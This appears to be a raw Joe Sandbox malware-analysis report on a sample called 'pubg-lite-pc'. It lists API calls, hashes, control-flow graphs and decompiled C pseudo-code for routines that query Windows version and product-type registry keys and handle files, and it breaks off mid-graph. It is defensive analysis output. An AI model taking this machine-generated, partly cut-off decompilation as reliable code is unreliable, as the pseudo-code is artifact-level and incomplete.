                                                                                                0x6d9815e8
                                                                                                0x6d9815eb
                                                                                                0x6d9815ee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9815f2
                                                                                                0x6d9815f5
                                                                                                0x6d9815fc
                                                                                                0x6d9815fc
                                                                                                0x00000000
                                                                                                0x6d9815f7
                                                                                                0x6d9815f7
                                                                                                0x6d9815fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9815fa
                                                                                                0x00000000
                                                                                                0x6d9815f5
                                                                                                0x6d98160b
                                                                                                0x6d98160d
                                                                                                0x6d98160d
                                                                                                0x6d981610
                                                                                                0x6d981610
                                                                                                0x6d981615
                                                                                                0x6d981618
                                                                                                0x6d98161b
                                                                                                0x6d98161e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981622
                                                                                                0x6d981625
                                                                                                0x6d98162c
                                                                                                0x6d98162c
                                                                                                0x00000000
                                                                                                0x6d981627
                                                                                                0x6d981627
                                                                                                0x6d98162a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98162a
                                                                                                0x00000000
                                                                                                0x6d981625
                                                                                                0x6d981638
                                                                                                0x6d98163a
                                                                                                0x6d98163a
                                                                                                0x6d981640
                                                                                                0x6d981640
                                                                                                0x6d981645
                                                                                                0x6d981648
                                                                                                0x6d98164b
                                                                                                0x6d98164e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981652
                                                                                                0x6d981655
                                                                                                0x6d98165c
                                                                                                0x6d98165c
                                                                                                0x00000000
                                                                                                0x6d981657
                                                                                                0x6d981657
                                                                                                0x6d98165a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98165a
                                                                                                0x00000000
                                                                                                0x6d981655
                                                                                                0x6d981668
                                                                                                0x6d981668
                                                                                                0x6d981670
                                                                                                0x6d981670
                                                                                                0x6d981675
                                                                                                0x6d981678
                                                                                                0x6d98167b
                                                                                                0x6d98167e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981682
                                                                                                0x6d981685
                                                                                                0x6d98168c
                                                                                                0x6d98168c
                                                                                                0x00000000
                                                                                                0x6d981687
                                                                                                0x6d981687
                                                                                                0x6d98168a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98168a
                                                                                                0x00000000
                                                                                                0x6d981685
                                                                                                0x00000000
                                                                                                0x6d9816c3
                                                                                                0x6d9816c3
                                                                                                0x6d9816c6
                                                                                                0x6d981370
                                                                                                0x6d981353
                                                                                                0x6d98132b
                                                                                                0x6d9816ce
                                                                                                0x6d9816d5
                                                                                                0x6d9816d8
                                                                                                0x6d9816e1
                                                                                                0x6d9816e4
                                                                                                0x6d9816ea
                                                                                                0x6d9816ea
                                                                                                0x6d9816f4
                                                                                                0x6d981713

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,?,?,?,?,?,?,00000000,6D9B8DBD,000000FF), ref: 6D98124C
                                                                                                • RegQueryValueExW.KERNEL32(?,ProductType,00000000,00000000,?,?,?,?,?,?,?,00000000,6D9B8DBD,000000FF), ref: 6D98127E
                                                                                                • RegQueryValueExW.KERNEL32(?,ProductSuite,00000000,00000000,?,?,?,?,?,?,?,00000000,6D9B8DBD,000000FF), ref: 6D981327
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000,6D9B8DBD,000000FF), ref: 6D9816E4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$Small Business$Small Business(Restricted)$Storage Server$Terminal Server
                                                                                                • API String ID: 1586453840-555442329
                                                                                                • Opcode ID: 8d204139396cdb0b12f03cc13b64dde57a7bcbbb97535cadf0864d6001a66b35
                                                                                                • Instruction ID: 3375db12439c3ad9d2156a0f3276ce6d6d648442741620354c56fa7d7b76d41d
                                                                                                • Opcode Fuzzy Hash: 8d204139396cdb0b12f03cc13b64dde57a7bcbbb97535cadf0864d6001a66b35
                                                                                                • Instruction Fuzzy Hash: 82E122396002078ADB119F94C1107F6F7B9FF03B95F598A55ECAA7B58AE730C941C790
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009E9FF0 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 216registrylibraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 204 9e9ff0-9ea066 RegOpenKeyExW 206 9ea06c-9ea0cd RegQueryValueExW * 2 204->206 207 9ea306-9ea31f 204->207 208 9ea0cf-9ea101 RegQueryValueExW 206->208 209 9ea12b-9ea16c RegQueryValueExW 206->209 210 9ea332-9ea34b call a4566b 207->210 211 9ea321-9ea328 RegCloseKey 207->211 208->209 212 9ea103-9ea10b 208->212 214 9ea16e-9ea18e call a3e120 209->214 215 9ea193-9ea1be RegQueryValueExW 209->215 211->210 212->212 216 9ea10d-9ea110 212->216 214->215 219 9ea1e5-9ea210 RegQueryValueExW 215->219 220 9ea1c0-9ea1e0 call a3e120 215->220 216->209 223 9ea112-9ea125 216->223 221 9ea26a-9ea27d 219->221 222 9ea212-9ea221 219->222 220->219 229 9ea27f-9ea293 call a45a61 221->229 230 9ea2c6-9ea2ce 221->230 227 9ea23f-9ea24d 222->227 228 9ea223-9ea22e 222->228 223->209 234 9ea24f 227->234 235 9ea25a-9ea265 227->235 233 9ea230-9ea23d 228->233 229->230 242 9ea295-9ea2c3 GetModuleHandleW GetProcAddress call a45a17 229->242 231 9ea2fa 230->231 232 9ea2d0-9ea2ec GetCurrentProcess IsWow64Process 230->232 238 9ea2fc-9ea301 call 9ea350 231->238 232->231 237 9ea2ee-9ea2f8 232->237 233->227 233->233 239 9ea250-9ea258 234->239 235->221 237->238 238->207 239->235 239->239 242->230
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 009EA05E
                                                                                                • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 009EA0A5
                                                                                                • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 009EA0C4
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 009EA0F3
                                                                                                • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 009EA168
                                                                                                • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 009EA1BA
                                                                                                • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 009EA20C
                                                                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 009EA2A3
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 009EA2AA
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 009EA2E1
                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 009EA2E8
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009EA322
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: QueryValue$Process$AddressCloseCurrentHandleModuleOpenProcWow64
                                                                                                • String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                                                                • API String ID: 2654979339-3583743485
                                                                                                • Opcode ID: 78eada80226e854b85e5af45b500e17dd2be0dd8ac054e994723336772a3fdb6
                                                                                                • Instruction ID: 9f530a0913ca7adeab51908feeae79ee0a26ff738e5d10f5eabc7db074499f7d
                                                                                                • Opcode Fuzzy Hash: 78eada80226e854b85e5af45b500e17dd2be0dd8ac054e994723336772a3fdb6
                                                                                                • Instruction Fuzzy Hash: 56918071900368EEDB21CF20CD45BD9BBB9FB54710F0002E6E509A72A1EB76AE94CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D980EE0 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 216registrylibraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 245 6d980ee0-6d980f52 RegOpenKeyExW 247 6d980f58-6d980f9b RegQueryValueExW * 2 245->247 248 6d981197-6d9811aa 245->248 249 6d980f9d-6d980fcf RegQueryValueExW 247->249 250 6d980ff6-6d981028 RegQueryValueExW 247->250 251 6d9811ba-6d9811da call 6d98a13f 248->251 252 6d9811ac-6d9811b3 RegCloseKey 248->252 249->250 253 6d980fd1-6d980fd9 249->253 254 6d981048-6d981067 RegQueryValueExW 250->254 255 6d98102a-6d981043 call 6d9792d0 250->255 252->251 253->253 259 6d980fdb-6d980fde 253->259 257 6d981069-6d98107f call 6d9792d0 254->257 258 6d981084-6d9810a6 RegQueryValueExW 254->258 255->254 257->258 263 6d9810a8-6d9810b7 258->263 264 6d9810fd-6d981117 258->264 259->250 265 6d980fe0-6d980ff3 259->265 268 6d9810b9-6d9810c2 263->268 269 6d9810d3-6d9810e1 263->269 270 6d981119-6d98112d call 6d98a4e1 264->270 271 6d981160-6d981168 264->271 265->250 274 6d9810c4-6d9810d1 268->274 275 6d9810ed-6d9810f8 269->275 276 6d9810e3-6d9810eb 269->276 270->271 282 6d98112f-6d98115d GetModuleHandleW GetProcAddress call 6d98a497 270->282 272 6d98116a-6d981180 GetCurrentProcess 271->272 273 6d98118b 271->273 272->273 283 6d981182-6d981189 272->283 278 6d98118d-6d981192 call 6d9811e0 273->278 274->269 274->274 275->264 276->275 276->276 278->248 282->271 283->278
                                                                                                C-Code - Quality: 89%
                                                                                                			E6D980EE0(void* __ebx, void* __edi, void* __esi) {
				signed int _t75;
				char _t76;
				char _t81;
				void* _t82;
				long _t95;
				long _t98;
				long _t101;
				signed int _t104;
				signed int _t108;
				signed int* _t113;
				char* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				char* _t122;
				void* _t127;
				char* _t128;
				signed int _t133;
				signed int _t135;
				signed int _t136;
				void* _t139;
				signed short _t142;
				void* _t143;
				intOrPtr* _t147;
				signed short _t148;
				char* _t149;
				void* _t150;
				void* _t152;

				_t143 = __edi;
				_t127 = __ebx;
				_t149 = _t150 - 0x63c;
				_t152 = _t150 - 0x618;
				_t75 =  *0x6d9e5024; // 0xe85bfa76
				_t76 = _t75 ^ _t149;
				_t149[0x638] = _t76;
				 *[fs:0x0] = _t149 - 0xc;
				 *(_t149 - 0x18) = 0x6d9d1fd4;
				 *(_t149 - 0x14) = 0;
				 *(_t149 - 4) = 0;
				_t128 = _t149 - 0x18;
				 *((intOrPtr*)( *(_t149 - 0x18) + 4))(_t76, __esi,  *[fs:0x0], E6D9B8D79, 0xffffffff);
				_t81 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119, _t149 - 0x14); // executed
				if(_t81 != 0) {
					L25:
					 *(_t149 - 4) = 0xffffffff;
					_t82 =  *(_t149 - 0x14);
					 *(_t149 - 0x18) = 0x6d9d1fd4;
					if(_t82 != 0) {
						RegCloseKey(_t82);
						 *(_t149 - 0x14) = 0;
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t149 - 0xc));
					return L6D98A13F(_t149[0x638] ^ _t149);
				}
				 *(_t149 - 0x1c) = _t81;
				 *(_t149 - 0x20) = _t81;
				 *(_t149 - 0x24) = 4;
				RegQueryValueExW( *(_t149 - 0x14), L"CurrentMajorVersionNumber", 0, 0, _t149 - 0x1c, _t149 - 0x24); // executed
				RegQueryValueExW( *(_t149 - 0x14), L"CurrentMinorVersionNumber", 0, 0, _t149 - 0x20, _t149 - 0x24); // executed
				if( *(_t149 - 0x1c) != 0) {
					L6:
					 *0x6d9f0038 =  *(_t149 - 0x1c);
					 *0x6d9f003c =  *(_t149 - 0x20);
					 *(_t149 - 0x28) = 0x208;
					_t95 = RegQueryValueExW( *(_t149 - 0x14), L"CurrentBuildNumber", 0, 0,  &(_t149[0x208]), _t149 - 0x28); // executed
					if(_t95 == 0) {
						_push(_t128);
						 *(_t149 - 0x10) = 0xffffffff;
						_t128 =  &(_t149[0x208]);
						_t118 = L6D9792D0(_t128, _t149 - 0x10);
						_t152 = _t152 + 4;
						 *0x6d9f0040 = _t118;
					}
					 *(_t149 - 0x2c) = 0x208;
					_t98 = RegQueryValueExW( *(_t149 - 0x14), L"ReleaseId", 0, 0, _t149, _t149 - 0x2c); // executed
					if(_t98 == 0) {
						_push(_t128);
						 *(_t149 - 0x10) = 0xffffffff;
						_t117 = L6D9792D0(_t149, _t149 - 0x10);
						_t152 = _t152 + 4;
						 *0x6d9f0150 = _t117;
					}
					 *(_t149 - 0x30) = 0x208;
					_t101 = RegQueryValueExW( *(_t149 - 0x14), L"CSDVersion", 0, 0,  &(_t149[0x410]), _t149 - 0x30); // executed
					if(_t101 != 0) {
						L17:
						_t133 =  *0x6d9ef60c; // 0x15
						_t103 =  *0x6d9f027c;
						if( *0x6d9f027c >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t133 * 4)) + 4))) {
							L6D98A4E1(_t103, 0x6d9f027c);
							if( *0x6d9f027c == 0xffffffff) {
								 *(_t149 - 4) = 1;
								 *0x6d9f0280 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
								 *(_t149 - 4) = 0;
								L6D98A497(0x6d9f027c);
							}
						}
						_t147 =  *0x6d9f0280;
						if(_t147 == 0) {
							L23:
							_t104 = 0;
							goto L24;
						} else {
							 *(_t149 - 0x10) = 0;
							_t108 =  *_t147(GetCurrentProcess(), _t149 - 0x10);
							if(_t108 == 0) {
								goto L23;
							}
							_t104 = _t108 & 0xffffff00 |  *(_t149 - 0x10) == 0x00000001;
							L24:
							 *0x6d9f014d = _t104;
							E6D9811E0(_t127, _t143, _t147);
							goto L25;
						}
					} else {
						_t148 = _t149[0x410];
						_t113 = 0x6d9f0048;
						if(_t148 == 0) {
							L14:
							_t135 = 0;
							 *_t113 = 0;
							_t114 =  &(_t149[0x410]);
							if(_t148 == 0) {
								L16:
								 *0x6d9f0044 = (_t149[0x40e + _t135 * 2] & 0x0000ffff) - 0x30;
								goto L17;
							} else {
								goto L15;
							}
							do {
								L15:
								_t114 =  &(_t114[2]);
								_t135 = _t135 + 1;
							} while ( *_t114 != 0);
							goto L16;
						}
						_t136 = _t148 & 0x0000ffff;
						_t139 =  &(_t149[0x410]) - 0x6d9f0048;
						do {
							 *_t113 = _t136;
							_t113 =  &(_t113[0]);
							_t136 =  *(_t139 + _t113) & 0x0000ffff;
						} while (_t136 != 0);
						goto L14;
					}
				}
				 *(_t149 - 0x10) = 0x20;
				RegQueryValueExW( *(_t149 - 0x14), L"CurrentVersion", 0, 0,  &(_t149[0x618]), _t149 - 0x10);
				_t142 = _t149[0x618];
				_t122 =  &(_t149[0x618]);
				_t128 = 0;
				if(_t142 != 0) {
					goto L3;
				}
				goto L6;
				L3:
				_t122 =  &(_t122[2]);
				_t128 =  &(_t128[1]);
				if( *_t122 != 0) {
					goto L3;
				} else {
					if(_t128 == 3) {
						 *(_t149 - 0x1c) = (_t142 & 0x0000ffff) - 0x30;
						 *(_t149 - 0x20) = (_t149[0x61c] & 0x0000ffff) - 0x30;
					}
					goto L6;
				}
			}






























                                                                                                0x6d980ee0
                                                                                                0x6d980ee0
                                                                                                0x6d980ee1
                                                                                                0x6d980efc
                                                                                                0x6d980eff
                                                                                                0x6d980f04
                                                                                                0x6d980f06
                                                                                                0x6d980f11
                                                                                                0x6d980f17
                                                                                                0x6d980f1e
                                                                                                0x6d980f25
                                                                                                0x6d980f2c
                                                                                                0x6d980f32
                                                                                                0x6d980f4a
                                                                                                0x6d980f52
                                                                                                0x6d981197
                                                                                                0x6d981197
                                                                                                0x6d98119e
                                                                                                0x6d9811a1
                                                                                                0x6d9811aa
                                                                                                0x6d9811ad
                                                                                                0x6d9811b3
                                                                                                0x6d9811b3
                                                                                                0x6d9811bd
                                                                                                0x6d9811da
                                                                                                0x6d9811da
                                                                                                0x6d980f5e
                                                                                                0x6d980f61
                                                                                                0x6d980f6b
                                                                                                0x6d980f7f
                                                                                                0x6d980f95
                                                                                                0x6d980f9b
                                                                                                0x6d980ff6
                                                                                                0x6d980ff9
                                                                                                0x6d981001
                                                                                                0x6d981010
                                                                                                0x6d981024
                                                                                                0x6d981028
                                                                                                0x6d98102a
                                                                                                0x6d98102e
                                                                                                0x6d981035
                                                                                                0x6d98103b
                                                                                                0x6d981040
                                                                                                0x6d981043
                                                                                                0x6d981043
                                                                                                0x6d98104b
                                                                                                0x6d981063
                                                                                                0x6d981067
                                                                                                0x6d981069
                                                                                                0x6d98106d
                                                                                                0x6d981077
                                                                                                0x6d98107c
                                                                                                0x6d98107f
                                                                                                0x6d98107f
                                                                                                0x6d981087
                                                                                                0x6d9810a2
                                                                                                0x6d9810a6
                                                                                                0x6d9810fd
                                                                                                0x6d981103
                                                                                                0x6d98110c
                                                                                                0x6d981117
                                                                                                0x6d98111e
                                                                                                0x6d98112d
                                                                                                0x6d98112f
                                                                                                0x6d98114a
                                                                                                0x6d98114f
                                                                                                0x6d981158
                                                                                                0x6d98115d
                                                                                                0x6d98112d
                                                                                                0x6d981160
                                                                                                0x6d981168
                                                                                                0x6d98118b
                                                                                                0x6d98118b
                                                                                                0x00000000
                                                                                                0x6d98116a
                                                                                                0x6d98116d
                                                                                                0x6d98117c
                                                                                                0x6d981180
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d981186
                                                                                                0x6d98118d
                                                                                                0x6d98118d
                                                                                                0x6d981192
                                                                                                0x00000000
                                                                                                0x6d981192
                                                                                                0x6d9810a8
                                                                                                0x6d9810a8
                                                                                                0x6d9810af
                                                                                                0x6d9810b7
                                                                                                0x6d9810d3
                                                                                                0x6d9810d3
                                                                                                0x6d9810d5
                                                                                                0x6d9810d8
                                                                                                0x6d9810e1
                                                                                                0x6d9810ed
                                                                                                0x6d9810f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9810e3
                                                                                                0x6d9810e3
                                                                                                0x6d9810e3
                                                                                                0x6d9810e6
                                                                                                0x6d9810e7
                                                                                                0x00000000
                                                                                                0x6d9810e3
                                                                                                0x6d9810bf
                                                                                                0x6d9810c2
                                                                                                0x6d9810c4
                                                                                                0x6d9810c4
                                                                                                0x6d9810c7
                                                                                                0x6d9810ca
                                                                                                0x6d9810ce
                                                                                                0x00000000
                                                                                                0x6d9810c4
                                                                                                0x6d9810a6
                                                                                                0x6d980fa0
                                                                                                0x6d980fbb
                                                                                                0x6d980fbd
                                                                                                0x6d980fc4
                                                                                                0x6d980fca
                                                                                                0x6d980fcf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d980fd1
                                                                                                0x6d980fd1
                                                                                                0x6d980fd4
                                                                                                0x6d980fd9
                                                                                                0x00000000
                                                                                                0x6d980fdb
                                                                                                0x6d980fde
                                                                                                0x6d980fe6
                                                                                                0x6d980ff3
                                                                                                0x6d980ff3
                                                                                                0x00000000
                                                                                                0x6d980fde

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D980F4A
                                                                                                • RegQueryValueExW.KERNEL32(?,CurrentMajorVersionNumber,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D980F7F
                                                                                                • RegQueryValueExW.KERNEL32(?,CurrentMinorVersionNumber,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D980F95
                                                                                                • RegQueryValueExW.ADVAPI32(?,CurrentVersion,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D980FBB
                                                                                                • RegQueryValueExW.KERNEL32(?,CurrentBuildNumber,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D981024
                                                                                                • RegQueryValueExW.KERNEL32(?,ReleaseId,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D981063
                                                                                                • RegQueryValueExW.KERNEL32(?,CSDVersion,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D9810A2
                                                                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D98113D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 6D981144
                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D981175
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000000,6D9B8D79,000000FF), ref: 6D9811AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: QueryValue$AddressCloseCurrentHandleModuleOpenProcProcess
                                                                                                • String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                                                                • API String ID: 3667490055-3583743485
                                                                                                • Opcode ID: b72e2018bc073814d9c2722d7519cf5313f673fa1ad24ae125fdd503d56ec600
                                                                                                • Instruction ID: cf183cb5c2930bc819a5a9773d37c968a4d5e9a766b1493511e06d125b61ab77
                                                                                                • Opcode Fuzzy Hash: b72e2018bc073814d9c2722d7519cf5313f673fa1ad24ae125fdd503d56ec600
                                                                                                • Instruction Fuzzy Hash: 70917FB190424E9EDF21CFA4CC45BFEBBB8FB05B14F10461AE925BB281E7749644CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CEC60 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 602COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 923 9cec60-9cec8f 924 9cf375-9cf37c call 9311f0 923->924 925 9cec95-9cec98 923->925 928 9cf381-9cf386 call 928fc0 924->928 925->924 927 9cec9e-9cecb2 925->927 929 9cecca-9cecd3 927->929 930 9cecb4-9cecc7 927->930 935 9cf38b-9cf395 call 928fc0 928->935 932 9cecec 929->932 933 9cecd5-9cecdc 929->933 934 9cecef-9ced07 call 928b00 932->934 933->932 936 9cece3-9cecea 933->936 934->924 941 9ced0d-9ced73 call 9b11c0 call 9354d0 call 9b3c20 PathFileExistsW 934->941 936->932 936->934 948 9ced7d-9ced91 941->948 949 9ced75-9ced78 941->949 950 9ced9b-9ced9f 948->950 951 9ced93-9ced96 948->951 949->948 952 9cee10-9cee22 call 9db9d0 950->952 953 9ceda1-9cedd1 GetLastError call 9b6f00 call 9b35e0 950->953 951->950 958 9cee28-9cee30 952->958 959 9cef11-9cef14 952->959 967 9cedd6-9cedfc call 9bd490 953->967 968 9cedd3 953->968 961 9cee46-9cee4d 958->961 962 9cee32-9cee40 958->962 959->924 964 9cef1a-9cef2d 959->964 965 9cef07-9cef0c 961->965 966 9cee53-9cee5c call 9292f0 961->966 962->959 962->961 969 9cef2f-9cef49 964->969 970 9cef7b-9cef7f 964->970 976 9cf318-9cf32c 965->976 966->928 987 9cee62-9cee9d call 939140 call 9b11c0 966->987 988 9cedfe-9cee01 967->988 989 9cee06-9cee0b 967->989 968->967 969->924 984 9cef4f-9cef6d call 9b35e0 969->984 974 9cef90-9cefd3 call 9b3a00 CreateFileW 970->974 975 9cef81-9cef8b call 9affb0 970->975 992 9cefd9-9cf00e GetLastError call 9b6f00 call 9b35e0 974->992 993 9cf12a-9cf130 974->993 975->974 978 9cf32e-9cf331 976->978 979 9cf336-9cf34b 976->979 978->979 985 9cf34d-9cf350 979->985 986 9cf355-9cf368 979->986 998 9cef6f 984->998 999 9cef72-9cef77 984->999 985->986 1020 9ceebd-9ceedf call 9e6300 987->1020 1021 9cee9f-9ceea1 987->1021 988->989 989->976 1012 9cf010 992->1012 1013 9cf013-9cf03b call 9bd490 992->1013 993->924 995 9cf136-9cf163 SetFilePointer 993->995 1000 9cf165-9cf196 GetLastError call 9b6f00 call 9b35e0 995->1000 1001 9cf1d6-9cf1fb call 9d1790 995->1001 998->999 999->970 1027 9cf198 1000->1027 1028 9cf19b-9cf1b4 call 9bd490 1000->1028 1001->924 1014 9cf201-9cf224 1001->1014 1012->1013 1031 9cf03d-9cf040 1013->1031 1032 9cf045-9cf04c 1013->1032 1018 9cf227-9cf229 1014->1018 1025 9cf23f-9cf265 ReadFile 1018->1025 1026 9cf22b-9cf236 1018->1026 1037 9ceee9-9ceefd 1020->1037 1038 9ceee1-9ceee4 1020->1038 1022 9ceea4-9ceead 1021->1022 1022->1022 1029 9ceeaf-9ceeb8 call 939140 1022->1029 1033 9cf2c9-9cf2cf 1025->1033 1034 9cf267-9cf26c 1025->1034 1048 9cf23c 1026->1048 1049 9cf36b-9cf370 1026->1049 1027->1028 1053 9cf1b7-9cf1c2 1028->1053 1029->1020 1031->1032 1039 9cf1cc-9cf1d1 1032->1039 1040 9cf052-9cf05b call 9292f0 1032->1040 1033->924 1042 9cf2d5-9cf2dd 1033->1042 1034->1033 1043 9cf26e-9cf272 1034->1043 1037->965 1046 9ceeff-9cef02 1037->1046 1038->1037 1045 9cf2f5-9cf305 1039->1045 1040->935 1063 9cf061-9cf084 call 939140 1040->1063 1050 9cf2e1-9cf2e6 call a45f29 1042->1050 1051 9cf284-9cf297 WriteFile 1043->1051 1052 9cf274-9cf281 call 9ee580 1043->1052 1059 9cf315 1045->1059 1060 9cf307-9cf30e FindCloseChangeNotification 1045->1060 1046->965 1048->1025 1049->1050 1064 9cf2eb-9cf2ee 1050->1064 1051->1033 1056 9cf299-9cf29e 1051->1056 1052->1051 1053->1039 1055 9cf1c4-9cf1c7 1053->1055 1055->1039 1056->1033 1062 9cf2a0-9cf2b2 1056->1062 1059->976 1060->1059 1065 9cf2b4-9cf2be 1062->1065 1066 9cf2c1-9cf2c3 1062->1066 1071 9cf0a9-9cf0d0 call 939140 GetLastError call 9b6f00 1063->1071 1072 9cf086-9cf08b 1063->1072 1064->1045 1065->1066 1066->1018 1066->1033 1080 9cf0f0-9cf112 call 9e6300 1071->1080 1081 9cf0d2-9cf0d4 1071->1081 1073 9cf090-9cf099 1072->1073 1073->1073 1075 9cf09b-9cf0a4 call 939140 1073->1075 1075->1071 1086 9cf11c-9cf125 1080->1086 1087 9cf114-9cf117 1080->1087 1082 